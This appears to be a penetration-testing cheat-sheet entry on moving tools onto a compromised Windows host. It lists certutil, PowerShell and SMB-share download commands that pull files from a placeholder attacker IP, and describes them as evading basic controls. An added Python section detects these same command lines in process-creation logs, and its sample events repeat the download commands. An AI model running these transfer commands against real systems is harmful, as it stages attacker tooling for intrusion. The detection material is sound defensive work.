🛠️ Command

Certutil Download

Download a file from a remote HTTP server using the built-in certutil utility.

certutil.exe -urlcache -split -f http://{{attacker_ip}}/{{file}} {{output_path}}

PowerShell Web Download

Use PowerShell’s Invoke-WebRequest to fetch a file from the attacker.

powershell -c "Invoke-WebRequest -Uri http://{{attacker_ip}}/{{file}} -OutFile {{output_path}}"

SMB Share Copy

Copy a file directly from an attacker-controlled SMB share.

copy \\{{attacker_ip}}\{{share}}\{{file}} {{output_path}}

Python HTTP Server (Attacker side)

Start a quick web server to host files for the target to download.

python3 -m http.server {{port}}

📝 Description

Common methods for moving tools and exploits onto a compromised Windows target.

Living off the Land (LotL) binaries like certutil and powershell are preferred as they are natively available and often bypass basic security controls. These techniques are essential for the initial post-exploitation phase where additional enumeration scripts or exploitation binaries are required.
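The flip side of the same point: because these transfers ride on built-in binaries, they leave very recognisable command lines in process-creation telemetry. The following is an added detection example, not part of the original cheat sheet. It runs simple rules over constructed process-creation records (field names loosely follow Sysmon Event ID 1 / Windows 4688 and are an assumption, as is the sample data, which uses the TEST-NET-3 address 203.0.113.10) and flags the three transfer patterns listed above: certutil with -urlcache and a URL, PowerShell with Invoke-WebRequest / DownloadFile / -OutFile, and a copy from a UNC path whose host is an IP literal. The ATT&CK reference T1105 (Ingress Tool Transfer) is the mapping a SOC would normally attach to these rules.

```python
"""Flag LOLBin file-transfer command lines in process-creation events (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str        # name of the detection rule that fired
    technique: str   # ATT&CK technique the rule maps to
    indicator: str   # URL or UNC path extracted for the analyst
    cmdline: str     # full command line, kept for triage


# http(s) URL up to the next whitespace or quote
URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)
# UNC path whose host is an IPv4 literal, e.g. \\203.0.113.10\share\file.
# Hostname-based shares are everyday traffic in most estates, so they are not
# flagged here; IP-literal shares are far rarer and a better first triage cue.
UNC_IP_RE = re.compile(r"""\\\\(\d{1,3}(?:\.\d{1,3}){3})\\[^\s"']+""")

POWERSHELL_MARKERS = ("invoke-webrequest", "iwr ", "downloadfile",
                      "downloadstring", "-outfile", "start-bitstransfer")


def _base(image: str) -> str:
    """Return the lower-cased file name of an image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(event: dict) -> list[Finding]:
    """Apply the three transfer rules to one process-creation record."""
    findings: list[Finding] = []
    exe = _base(event["image"])
    cmd = event["cmdline"]
    low = cmd.lower()

    # Rule 1: certutil -urlcache ... <URL>  (certutil download)
    if exe == "certutil.exe" and "-urlcache" in low:
        m = URL_RE.search(cmd)
        if m:
            findings.append(Finding("certutil_urlcache_download", "T1105", m.group(0), cmd))

    # Rule 2: PowerShell web download cmdlets / .NET WebClient methods
    if exe in ("powershell.exe", "pwsh.exe") and any(k in low for k in POWERSHELL_MARKERS):
        m = URL_RE.search(cmd)
        findings.append(Finding("powershell_web_download", "T1105",
                                m.group(0) if m else "(no URL in cmdline)", cmd))

    # Rule 3: copy/xcopy/robocopy reading from an IP-literal UNC share.
    # "copy" is a cmd.exe builtin, so the image is cmd.exe in that case.
    if exe in ("cmd.exe", "xcopy.exe", "robocopy.exe"):
        m = UNC_IP_RE.search(cmd)
        if m and any(tok in low for tok in ("copy ", "xcopy", "robocopy")):
            findings.append(Finding("smb_copy_from_ip_literal", "T1105", m.group(0), cmd))

    return findings


def scan(events: list[dict]) -> list[Finding]:
    """Run check_event over a batch of records and collect every finding."""
    out: list[Finding] = []
    for ev in events:
        out.extend(check_event(ev))
    return out


# Constructed sample records (assumption: Sysmon/4688-like fields, not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/tool.exe C:\Users\Public\tool.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",            # benign: hashing a file
     "cmdline": r"certutil.exe -hashfile C:\Users\Public\tool.exe SHA256"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "Invoke-WebRequest -Uri http://203.0.113.10/run.ps1 -OutFile C:\Users\Public\run.ps1"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",   # benign admin use
     "cmdline": r'powershell.exe -c "Get-Process | Sort-Object CPU"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy \\203.0.113.10\tools\nc.exe C:\Users\Public\nc.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",                 # hostname share: not flagged
     "cmdline": r"cmd.exe /c copy \\fileserver01\public\report.docx C:\Temp\report.docx"},
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] ({f.technique}) {f.indicator}\n    {f.cmdline}")
```

On the sample batch the scanner raises three findings (the certutil download, the PowerShell download and the IP-literal SMB copy) and stays quiet on the two benign command lines and the hostname-based share. In production the same rules are usually expressed as Sigma or SIEM queries over the command-line field, with the hostname-share case routed to a lower-severity rule rather than dropped.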

🔗 References